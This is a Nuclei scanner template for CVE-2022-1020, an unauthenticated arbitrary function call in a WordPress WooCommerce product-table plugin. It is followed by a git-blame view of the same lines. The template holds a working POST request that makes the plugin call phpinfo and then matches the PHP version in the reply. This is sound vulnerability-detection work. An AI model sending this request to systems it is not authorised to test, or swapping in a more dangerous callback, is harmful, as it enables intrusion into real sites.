nuclei-templates/http/cves/2022/CVE-2022-1020.yaml

id: CVE-2022-1020

info:
  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
  author: Akincibor
  severity: critical
  description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1020
    cwe-id: CWE-352
    epss-score: 0.00614
    cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:*
    epss-percentile: 0.76048
  metadata:
    max-request: 1
    framework: wordpress
    vendor: codeastrology
    product: woo_product_table
  tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00			`id: CVE-2022-1020`

			`info:`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call`
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00			`author: Akincibor`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`severity: critical`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.`
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1020`
Description and classification CVE id fix in CVE-2022-1020.yaml 2022-04-22 16:21:09 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Description and classification CVE id fix in CVE-2022-1020.yaml 2022-04-22 16:21:09 +00:00			`cve-id: CVE-2022-1020`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cwe-id: CWE-352`
			`epss-score: 0.00614`
			`cpe: cpe:2.3:a:codeastrology:woo_product_table::::::wordpress::*`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-percentile: 0.76048`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`framework: wordpress`
			`vendor: codeastrology`
			`product: woo_product_table`
			`tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth`
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Update CVE-2022-1020.yaml 2022-04-22 13:20:27 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`option_key=a&perpose=update&callback=phpinfo`
Create CVE-2022-1020.yaml 2022-04-20 22:47:29 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "PHP Extension"`
			`- "PHP Version"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`group: 1`
			`regex:`
			`- '>PHP Version <\/td><td class="v">([0-9.]+)'`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: body`